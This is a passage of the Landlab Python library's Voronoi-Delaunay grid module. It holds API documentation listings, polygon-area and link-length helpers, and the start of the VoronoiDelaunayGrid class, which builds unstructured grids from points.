The *attribute* is singular if there is only one value per element; for
example, there is only one node associated with each cell. It is plural when
there are multiple values per element; for example, the `faces_at_cell` array
contains multiple faces for each cell. Exceptions to these general rules are
functions that return indices of a subset of all elements of a particular type.
For example, you can obtain an array with IDs of only the core nodes using
`core_nodes`, while `active_links` provides an array of IDs of active links
(only). Finally, attributes that represent a measurement of something, such as
the length of a link or the surface area of a cell, are described using `_of_`,
as in the example `area_of_cell`.
Information about the grid as a whole
+++++++++++++++++++++++++++++++++++++
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.axis_name
~landlab.grid.voronoi.VoronoiDelaunayGrid.axis_units
~landlab.grid.voronoi.VoronoiDelaunayGrid.move_origin
~landlab.grid.voronoi.VoronoiDelaunayGrid.ndim
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_axis_coordinates
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_elements
~landlab.grid.voronoi.VoronoiDelaunayGrid.save
~landlab.grid.voronoi.VoronoiDelaunayGrid.size
Information about nodes
+++++++++++++++++++++++
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.active_link_dirs_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.active_neighbors_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.all_node_azimuths_map
~landlab.grid.voronoi.VoronoiDelaunayGrid.all_node_distances_map
~landlab.grid.voronoi.VoronoiDelaunayGrid.boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_distances_of_nodes_to_point
~landlab.grid.voronoi.VoronoiDelaunayGrid.cell_area_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.cell_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.closed_boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.core_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.downwind_links_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.fixed_gradient_boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.fixed_value_boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.link_at_node_is_downwind
~landlab.grid.voronoi.VoronoiDelaunayGrid.link_at_node_is_upwind
~landlab.grid.voronoi.VoronoiDelaunayGrid.link_dirs_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.links_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.neighbors_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_at_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_at_core_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_at_link_head
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_at_link_tail
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_axis_coordinates
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_is_boundary
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_x
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_y
~landlab.grid.voronoi.VoronoiDelaunayGrid.nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.nodes_at_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_core_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_links_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_patches_present_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.open_boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.patches_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.patches_present_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.set_nodata_nodes_to_closed
~landlab.grid.voronoi.VoronoiDelaunayGrid.set_nodata_nodes_to_fixed_gradient
~landlab.grid.voronoi.VoronoiDelaunayGrid.status_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.unit_vector_sum_xcomponent_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.unit_vector_sum_ycomponent_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.upwind_links_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.x_of_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.y_of_node
Information about links
+++++++++++++++++++++++
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.active_link_dirs_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.active_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.angle_of_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.angle_of_link_about_head
~landlab.grid.voronoi.VoronoiDelaunayGrid.downwind_links_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.face_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.fixed_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.length_of_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.link_at_face
~landlab.grid.voronoi.VoronoiDelaunayGrid.link_at_node_is_downwind
~landlab.grid.voronoi.VoronoiDelaunayGrid.link_at_node_is_upwind
~landlab.grid.voronoi.VoronoiDelaunayGrid.link_dirs_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.links_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.links_at_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_at_link_head
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_at_link_tail
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_active_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_fixed_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_links_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_patches_present_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.patches_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.patches_present_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.resolve_values_on_active_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.resolve_values_on_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.status_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.unit_vector_xcomponent_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.unit_vector_ycomponent_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.upwind_links_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.x_of_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.y_of_link
Information about cells
+++++++++++++++++++++++
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.area_of_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.cell_area_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.cell_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.core_cells
~landlab.grid.voronoi.VoronoiDelaunayGrid.faces_at_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_at_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_at_core_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_cells
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_core_cells
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_faces_at_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.x_of_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.y_of_cell
Information about faces
+++++++++++++++++++++++
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.active_faces
~landlab.grid.voronoi.VoronoiDelaunayGrid.face_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.faces_at_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.link_at_face
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_active_faces
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_faces
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_faces_at_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.width_of_face
~landlab.grid.voronoi.VoronoiDelaunayGrid.x_of_face
~landlab.grid.voronoi.VoronoiDelaunayGrid.y_of_face
Information about patches
+++++++++++++++++++++++++
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.links_at_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.nodes_at_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_patches
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_patches_present_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_patches_present_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.patches_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.patches_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.patches_present_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.patches_present_at_node
Information about corners
+++++++++++++++++++++++++
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_corners
Data Fields in ModelGrid
------------------------
:class:`~.ModelGrid` inherits from the :class:`~.ModelDataFields` class. This
provides `~.ModelGrid`, and its subclasses, with the ability to, optionally,
store data values that are associated with the different types grid elements
(nodes, cells, etc.). In particular, as part of ``ModelGrid.__init__()``,
data field *groups* are added to the `ModelGrid` that provide containers to
put data fields into. There is one group for each of the eight grid elements
(node, cell, link, face, core_node, core_cell, active_link, and active_face).
To access these groups, use the same methods as accessing groups with
`~.ModelDataFields`. ``ModelGrid.__init__()`` adds the following attributes to
itself that provide access to the values groups:
.. autosummary::
:toctree: generated/
:nosignatures:
~landlab.grid.voronoi.VoronoiDelaunayGrid.at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.at_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.at_face
~landlab.grid.voronoi.VoronoiDelaunayGrid.at_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.at_corner
Each of these attributes returns a ``dict``-like object whose keys are value
names as strings and values are numpy arrays that gives quantities at
grid elements.
Create Field Arrays
+++++++++++++++++++
:class:`~.ModelGrid` inherits several useful methods for creating new data
fields and adding new data fields to a ModelGrid instance. Methods to add or
create a new data array follow the ``numpy`` syntax for creating arrays. The
folowing methods create and, optionally, initialize new arrays. These arrays
are of the correct size but a new field will not be added to the field:
.. autosummary::
:toctree: generated/
:nosignatures:
~landlab.field.grouped.ModelDataFields.empty
~landlab.field.grouped.ModelDataFields.ones
~landlab.field.grouped.ModelDataFields.zeros
Add Fields to a ModelGrid
+++++++++++++++++++++++++
Unlike with the equivalent numpy functions, these do not take a size argument
as the size of the returned arrays is determined from the size of the
ModelGrid. However, the keyword arguments are the same as those of the numpy
equivalents.
The following methods will create a new array and add a reference to that
array to the ModelGrid:
.. autosummary::
:toctree: generated/
:nosignatures:
~landlab.grid.voronoi.VoronoiDelaunayGrid.add_empty
~landlab.grid.voronoi.VoronoiDelaunayGrid.add_field
~landlab.grid.voronoi.VoronoiDelaunayGrid.add_ones
~landlab.grid.voronoi.VoronoiDelaunayGrid.add_zeros
~landlab.grid.voronoi.VoronoiDelaunayGrid.delete_field
~landlab.grid.voronoi.VoronoiDelaunayGrid.set_units
These methods operate in the same way as the previous set except that, in
addition to creating a new array, the newly-created array is added to the
ModelGrid. The calling signature is the same but with the addition of an
argument that gives the name of the new field as a string. The additional
method, :meth:`~.ModelDataFields.add_field`, adds a previously allocation
array to the ModelGrid. If the array is of the incorrect size it will raise
``ValueError``.
Query Fields
++++++++++++
Use the following methods/attributes get information about the stored data
fields:
.. autosummary::
:toctree: generated/
:nosignatures:
~landlab.field.grouped.ModelDataFields.size
~landlab.field.grouped.ModelDataFields.keys
~landlab.field.grouped.ModelDataFields.has_group
~landlab.field.grouped.ModelDataFields.has_field
~landlab.grid.voronoi.VoronoiDelaunayGrid.field_units
~landlab.grid.voronoi.VoronoiDelaunayGrid.field_values
~landlab.field.grouped.ModelDataFields.groups
i.e., call, e.g. mg.has_field('node', 'my_field_name')
# START HERE check that all functions listed below are included above,
# ignore ones that start with underscores(_)
Gradients, fluxes, and divergences on the grid
----------------------------------------------
Landlab is designed to easily calculate gradients in quantities across the
grid, and to construct fluxes and flux divergences from them. Because these
calculations tend to be a little more involved than property lookups, the
methods tend to start with `calc_`.
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_diff_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_flux_div_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_grad_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_grad_at_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_net_flux_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_slope_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_slope_at_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_unit_normal_at_patch
Mappers
-------
These methods allow mapping of values defined on one grid element type onto a
second, e.g., mapping upwind node values onto links, or mean link values onto
nodes.
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_downwind_node_link_max_to_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_downwind_node_link_mean_to_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_link_head_node_to_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_link_tail_node_to_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_link_vector_sum_to_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_link_vector_to_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_max_of_link_nodes_to_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_max_of_node_links_to_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_max_of_patch_nodes_to_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_mean_of_link_nodes_to_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_mean_of_patch_nodes_to_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_min_of_link_nodes_to_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_min_of_node_links_to_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_min_of_patch_nodes_to_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_node_to_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_upwind_node_link_max_to_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_upwind_node_link_mean_to_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_value_at_downwind_node_link_max_to_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_value_at_max_node_to_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_value_at_min_node_to_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_value_at_upwind_node_link_max_to_node
Boundary condition control
--------------------------
These are the primary properties for getting and setting the grid boundary
conditions. Changes made to :meth:`~.ModelGrid.status_at_node` and
:meth:`~.ModelGrid.status_at_node` will automatically update the conditions
defined at other grid elements automatically.
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.active_faces
~landlab.grid.voronoi.VoronoiDelaunayGrid.active_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.active_neighbors_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.closed_boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.core_cells
~landlab.grid.voronoi.VoronoiDelaunayGrid.core_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.fixed_gradient_boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.fixed_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.fixed_value_boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_at_core_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_is_boundary
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_active_faces
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_active_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_core_cells
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_core_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_fixed_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_patches_present_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_patches_present_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.open_boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.set_nodata_nodes_to_closed
~landlab.grid.voronoi.VoronoiDelaunayGrid.set_nodata_nodes_to_fixed_gradient
~landlab.grid.voronoi.VoronoiDelaunayGrid.status_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.status_at_node
Identifying node subsets
------------------------
These methods are useful in identifying subsets of nodes, e.g., closest node
to a point; nodes at edges.
(None are available for this grid type)
Surface analysis
----------------
These methods permit the kinds of surface analysis that you might expect to
find in GIS software.
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_aspect_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_hillshade_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_slope_at_node
Notes
-----
It is important that when creating a new grid class that inherits from
``ModelGrid``, to call ``ModelGrid.__init__()`` in the new grid's
``__init__()``. For example, the new class's __init__ should contain the
following code,
.. code-block:: python
class NewGrid(ModelGrid):
def __init__(self, *args, **kwds):
ModelGrid.__init__(self, **kwds)
# Code that initializes the NewGrid
Without this, the new grid class will not have the ``at_*`` attributes.
"""
import numpy as np
from six.moves import range
from landlab.grid.base import (ModelGrid, CORE_NODE, BAD_INDEX_VALUE,
INACTIVE_LINK)
from landlab.core.utils import (as_id_array, sort_points_by_x_then_y,
argsort_points_by_x_then_y,
anticlockwise_argsort_points)
from .decorators import return_readonly_id_array
from scipy.spatial import Voronoi
def simple_poly_area(x, y):
"""Calculates and returns the area of a 2-D simple polygon.
Input vertices must be in sequence (clockwise or counterclockwise). *x*
and *y* are arrays that give the x- and y-axis coordinates of the
polygon's vertices.
Parameters
----------
x : ndarray
x-coordinates of of polygon vertices.
y : ndarray
y-coordinates of of polygon vertices.
Returns
-------
out : float
Area of the polygon
Examples
--------
>>> import numpy as np
>>> from landlab.grid.voronoi import simple_poly_area
>>> x = np.array([3., 1., 1., 3.])
>>> y = np.array([1.5, 1.5, 0.5, 0.5])
>>> simple_poly_area(x, y)
2.0
If the input coordinate arrays are 2D, calculate the area of each polygon.
Note that when used in this mode, all polygons must have the same
number of vertices, and polygon vertices are listed column-by-column.
>>> x = np.array([[ 3., 1., 1., 3.],
... [-2., -2., -1., -1.]]).T
>>> y = np.array([[1.5, 1.5, 0.5, 0.5],
... [ 0., 1., 2., 0.]]).T
>>> simple_poly_area(x, y)
array([ 2. , 1.5])
"""
# For short arrays (less than about 100 elements) it seems that the
# Python sum is faster than the numpy sum. Likewise for the Python
# built-in abs.
return .5 * abs(sum(x[:-1] * y[1:] - x[1:] * y[:-1]) +
x[-1] * y[0] - x[0] * y[-1])
def calculate_link_lengths(pts, link_from, link_to):
"""Calculates and returns length of links between nodes.
Parameters
----------
pts : Nx2 numpy array containing (x,y) values
link_from : 1D numpy array containing index numbers of nodes at starting
point ("from") of links
link_to : 1D numpy array containing index numbers of nodes at ending point
("to") of links
Returns
-------
out : ndarray
1D numpy array containing horizontal length of each link
Examples
--------
>>> import numpy as np
>>> from landlab.grid.voronoi import calculate_link_lengths
>>> pts = np.array([[0.,0.],[3.,0.],[3.,4.]]) # 3:4:5 triangle
>>> lfrom = np.array([0,1,2])
>>> lto = np.array([1,2,0])
>>> calculate_link_lengths(pts, lfrom, lto)
array([ 3., 4., 5.])
"""
dx = pts[link_to, 0] - pts[link_from, 0]
dy = pts[link_to, 1] - pts[link_from, 1]
link_length = np.sqrt(dx * dx + dy * dy)
return link_length
class VoronoiDelaunayGrid(ModelGrid):
"""
This inherited class implements an unstructured grid in which cells are
Voronoi polygons and nodes are connected by a Delaunay triangulation. Uses
scipy.spatial module to build the triangulation.
Create an unstructured grid from points whose coordinates are given
by the arrays *x*, *y*.
Parameters
----------
x : array_like
x-coordinate of points
y : array_like
y-coordinate of points
reorient_links (optional) : bool
whether to point all links to the upper-right quadrant
Returns
-------
VoronoiDelaunayGrid
A newly-created grid.
Examples
--------
>>> from numpy.random import rand
>>> from landlab.grid import VoronoiDelaunayGrid
>>> x, y = rand(25), rand(25)
>>> vmg = VoronoiDelaunayGrid(x, y) # node_x_coords, node_y_coords
>>> vmg.number_of_nodes
25
>>> import numpy as np
>>> x = [0, 0.1, 0.2, 0.3,
... 1, 1.1, 1.2, 1.3,
... 2, 2.1, 2.2, 2.3,]
>>> y = [0, 1, 2, 3,
... 0, 1, 2, 3,
... 0, 1, 2, 3]
>>> vmg = VoronoiDelaunayGrid(x, y)
>>> vmg.node_x # doctest: +NORMALIZE_WHITESPACE
array([ 0. , 1. , 2. ,
0.1, 1.1, 2.1,
0.2, 1.2, 2.2,
0.3, 1.3, 2.3])
>>> vmg.node_y # doctest: +NORMALIZE_WHITESPACE
array([ 0., 0., 0.,
1., 1., 1.,
2., 2., 2.,
3., 3., 3.])
"""
def __init__(self, x=None, y=None, reorient_links=True, **kwds):
"""
Create a Voronoi Delaunay grid from a set of points.
Create an unstructured grid from points whose coordinates are given
by the arrays *x*, *y*.
Parameters
----------
x : array_like
x-coordinate of points
y : array_like
y-coordinate of points
reorient_links (optional) : bool
whether to point all links to the upper-right quadrant
Returns
-------
VoronoiDelaunayGrid
A newly-created grid.
Examples
--------
>>> from numpy.random import rand
>>> from landlab.grid import VoronoiDelaunayGrid
>>> x, y = rand(25), rand(25)
>>> vmg = VoronoiDelaunayGrid(x, y) # node_x_coords, node_y_coords
>>> vmg.number_of_nodes
25
"""
if (x is not None) and (y is not None):
self._initialize(x, y, reorient_links)
super(VoronoiDelaunayGrid, self).__init__(**kwds)
def _initialize(self, x, y, reorient_links=True):
"""
Creates an unstructured grid around the given (x,y) points.
"""
x = np.asarray(x, dtype=float).reshape((-1, ))
y = np.asarray(y, dtype=float).reshape((-1, ))
if x.size != y.size:
raise ValueError('x and y arrays must have the same size')
# Make a copy of the points in a 2D array (useful for calls to geometry
# routines, but takes extra memory space).
pts = np.zeros((len(x), 2))
pts[:, 0] = x
pts[:, 1] = y
self.pts = sort_points_by_x_then_y(pts)
x = self.pts[:, 0]
y = self.pts[:, 1]
# NODES AND CELLS: Set up information pertaining to nodes and cells:
# - number of nodes
# - node x, y coordinates
# - default boundary status
# - interior and boundary nodes
# - nodes associated with each cell and active cell
# - cells and active cells associated with each node
# (or BAD_VALUE_INDEX if none)
#
# Assumptions we make here:
# - all interior (non-perimeter) nodes have cells (this should be
# guaranteed in a Delaunay triangulation, but there may be
# special cases)
# - all cells are active (later we'll build a mechanism for the user
# specify a subset of cells as active)
#
self._node_x = x
self._node_y = y
[self._node_status, self._core_nodes, self._boundary_nodes] = \
self._find_perimeter_nodes_and_BC_set(pts)
[self._cell_at_node, self._node_at_cell] = \
self._node_to_cell_connectivity(self._node_status,
self.number_of_cells)
active_cell_at_node = self.cell_at_node[self.core_nodes]
# ACTIVE CELLS: Construct Voronoi diagram and calculate surface area of
# each active cell.
vor = Voronoi(self.pts)
self.vor = vor
self._area_of_cell = np.zeros(self.number_of_cells)
for node in self._node_at_cell:
xv = vor.vertices[vor.regions[vor.point_region[node]], 0]
yv = vor.vertices[vor.regions[vor.point_region[node]], 1]
self._area_of_cell[self.cell_at_node[node]] = (
simple_poly_area(xv, yv))
# LINKS: Construct Delaunay triangulation and construct lists of link
# "from" and "to" nodes.
(self._node_at_link_tail,
self._node_at_link_head,
_,
self._face_width) = \
self._create_links_and_faces_from_voronoi_diagram(vor)
self._status_at_link = np.full(len(self._node_at_link_tail),
INACTIVE_LINK, dtype=int)
# Sort them by midpoint coordinates
self._sort_links_by_midpoint()
# Optionally re-orient links so that they all point within upper-right
# semicircle
if reorient_links:
self._reorient_links_upper_right()
# LINKS: Calculate link lengths
self._link_length = calculate_link_lengths(self.pts,
self.node_at_link_tail,
self.node_at_link_head)
# LINKS: inlink and outlink matrices
# SOON TO BE DEPRECATED
self._setup_inlink_and_outlink_matrices()
# ACTIVE LINKS: Create list of active links, as well as "from" and "to"
# nodes of active links.
self._reset_link_status_list()
# NODES & LINKS: IDs and directions of links at each node
self._create_links_and_link_dirs_at_node()
# LINKS: set up link unit vectors and node unit-vector sums
self._create_link_unit_vectors()
# create link x, y:
self._create_link_face_coords()
self._create_neighbors()
@property
def number_of_patches(self):
"""Number of patches.
Returns the number of patches over the grid.
LLCATS: PINF
"""
try:
return self._number_of_patches
except AttributeError:
self._create_patches_from_delaunay_diagram(self.pts, self.vor)
return self._number_of_patches
@property
def nodes_at_patch(self):
"""Get the four nodes at the corners of each patch in a regular grid.
LLCATS: PINF NINF CONN
"""
try:
return self._nodes_at_patch
except AttributeError:
self._create_patches_from_delaunay_diagram(self.pts, self.vor)
return self._nodes_at_patch
@property
@return_readonly_id_array
def patches_at_node(self):
"""
Return a (nnodes, max_voronoi_polygon_sides) array of patches at nodes.
The patches are returned in LL standard order (ccw from E), with any
nonexistent patches recorded after the ids of existing faces.
Nonexistent patches are ID'ed as -1.
Examples
--------
>>> from landlab import HexModelGrid
>>> mg = HexModelGrid(3, 3)
>>> mg.patches_at_node # doctest: +SKIP
array([[ 0, 2, -1, -1, -1, -1],
[ 1, 3, 0, -1, -1, -1],
[ 4, 1, -1, -1, -1, -1],
[ 5, 2, -1, -1, -1, -1],
[ 6, 8, 5, 2, 0, 3],
[ 7, 9, 6, 3, 1, 4],
[ 7, 4, -1, -1, -1, -1],
[ 5, 8, -1, -1, -1, -1],
[ 8, 6, 9, -1, -1, -1],
[ 9, 7, -1, -1, -1, -1]])
LLCATS: NINF PINF CONN
"""
try:
return self._patches_at_node
except AttributeError:
self._create_patches_from_delaunay_diagram(self.pts, self.vor)
return self._patches_at_node
@property
@return_readonly_id_array
def links_at_patch(self):
"""Returns the links forming each patch.
Examples
--------
>>> from landlab import HexModelGrid
>>> mg = HexModelGrid(3, 2)
>>> mg.links_at_patch
array([[ 3, 2, 0],
[ 5, 1, 2],
[ 6, 3, 4],
[ 8, 7, 5],
[10, 9, 6],
[11, 8, 9]])
LLCATS: LINF PINF CONN
"""
try:
return self._links_at_patch
except AttributeError:
self._create_patches_from_delaunay_diagram(self.pts, self.vor)
return self._links_at_patch
@property
@return_readonly_id_array
def patches_at_link(self):
"""Returns the patches adjoined to each link.
Examples
--------
>>> from landlab import HexModelGrid
>>> mg = HexModelGrid(3, 2)
>>> mg.patches_at_link
array([[ 0, -1],
[ 1, -1],
[ 0, 1],
[ 0, 2],
[ 2, -1],
[ 1, 3],
[ 2, 4],
[ 3, -1],
[ 3, 5],
[ 4, 5],
[ 4, -1],
[ 5, -1]])
LLCATS: PINF LINF CONN
"""
try:
return self._patches_at_link
except AttributeError:
self._create_patches_from_delaunay_diagram(self.pts, self.vor)
return self._patches_at_link
def _find_perimeter_nodes_and_BC_set(self, pts):
"""
Uses a convex hull to locate the perimeter nodes of the Voronoi grid,
then sets them as fixed value boundary nodes.
It then sets/updates the various relevant node lists held by the grid,
and returns *node_status*, *core_nodes*, *boundary_nodes*.
"""
# Calculate the convex hull for the set of points
from scipy.spatial import ConvexHull
hull = ConvexHull(pts, qhull_options='Qc') # see below why we use 'Qt'
# The ConvexHull object lists the edges that form the hull. We need to
# get from this list of edges the unique set of nodes. To do this, we
# first flatten the list of vertices that make up all the hull edges
# ("simplices"), so it becomes a 1D array. With that, we can use the
# set() function to turn the array into a set, which removes duplicate
# vertices. Then we turn it back into an array, which now contains the
# set of IDs for the nodes that make up the convex hull.
# The next thing to worry about is the fact that the mesh perimeter
# might contain nodes that are co-planar (that is, co-linear in our 2D
# world). For example, if you make a set of staggered points for a
# hexagonal lattice using make_hex_points(), there will be some
# co-linear points along the perimeter. The ones of these that don't
# form convex corners won't be included in convex_hull_nodes, but they
# are nonetheless part of the perimeter and need to be included in
# the list of boundary_nodes. To deal with this, we pass the 'Qt'
# option to ConvexHull, which makes it generate a list of coplanar
# points. We include these in our set of boundary nodes.
convex_hull_nodes = np.array(list(set(hull.simplices.flatten())))
coplanar_nodes = hull.coplanar[:, 0]
boundary_nodes = as_id_array(np.concatenate(
(convex_hull_nodes, coplanar_nodes)))
# Now we'll create the "node_status" array, which contains the code
# indicating whether the node is interior and active (=0) or a
# boundary (=1). This means that all perimeter (convex hull) nodes are
# initially flagged as boundary code 1. An application might wish to
# change this so that, for example, some boundaries are inactive.
node_status = np.zeros(len(pts[:, 0]), dtype=np.int8)
node_status[boundary_nodes] = 1
# It's also useful to have a list of interior nodes
core_nodes = as_id_array(np.where(node_status == 0)[0])
# save the arrays and update the properties
self._node_status = node_status
self._core_cells = np.arange(len(core_nodes), dtype=np.int)
self._node_at_cell = core_nodes
self._boundary_nodes = boundary_nodes
# Return the results
return node_status, core_nodes, boundary_nodes
def _create_cell_areas_array(self):
"""Set up an array of cell areas."""
self._cell_areas = self.active_cell_areas
return self._cell_areas
@staticmethod
def _node_to_cell_connectivity(node_status, ncells):
"""Set up node connectivity.
Creates and returns the following arrays:
* For each node, the ID of the corresponding cell, or
BAD_INDEX_VALUE if the node has no cell.
* For each cell, the ID of the corresponding node.
Parameters
----------
node_status : ndarray of ints
1D array containing the boundary status code for each node.
ncells : ndarray of ints
Number of cells (must equal the number of occurrences of CORE_NODE
in node_status).
Examples
--------
